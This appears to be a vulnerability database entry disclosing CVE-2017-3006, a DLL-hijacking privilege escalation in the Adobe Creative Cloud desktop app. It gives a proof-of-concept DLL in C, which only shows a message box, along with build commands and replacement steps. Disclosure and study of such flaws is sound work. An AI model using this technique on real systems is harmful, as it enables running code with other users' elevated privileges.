Lucene search
AnonymousSSV:92963HistoryApr 17, 2017 - 12:00 a.m.
Adobe Creative Cloud desktop application 4. 0. 0. 185 elevation of privilege vulnerability, CVE-2017-3006)
2017-04-1700:00:00
Anonymous
www.seebug.org
12
0.029 Low
EPSS
Percentile
90.9%
Adobe CC uses weak insecure permissions settings on the “Adobe Photoshop dll & Startup Scripts” directories. This may allow authenticated users
to execute arbitrary code in the security context of ANY other users with elevated privileges on the affected system. Issue is the ‘C’ flag
(Change) for ‘Authenticated Users’ group.
Compile below DLL 'C' code name it as "libifcoremd.dll"
Replace existing Adobe CC "libifcoremd.dll" file, wait for it to be referenced.
#include <windows.h>
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
switch (reason) {
case DLL_PROCESS_ATTACH:
MessageBox(NULL, NULL, "PWN!", MB_OK);
break;
}
return TRUE;
}
gcc -c libifcoremd.c
gcc -shared -o libifcoremd.dll libifcoremd.o
Related
zdt
zdt
exploitpack
exploitpack
cve
cve
CVE-2017-3006
2017-04-12 14:59:01
nvd
nvd
CVE-2017-3006
2017-04-12 14:59:01
packetstorm
packetstorm
Adobe Creative Cloud Desktop Application 4.0.0.185 Privilege Escalation
2017-04-13 00:00:00
prion
prion
Sql injection
2017-04-12 14:59:00
cvelist
cvelist
CVE-2017-3006
2017-04-12 14:00:00
exploitdb
exploitdb
openvas
openvas
Adobe Creative Cloud Security Update (APSB17-13) - Windows
2017-05-04 00:00:00
nessus
nessus
adobe
adobe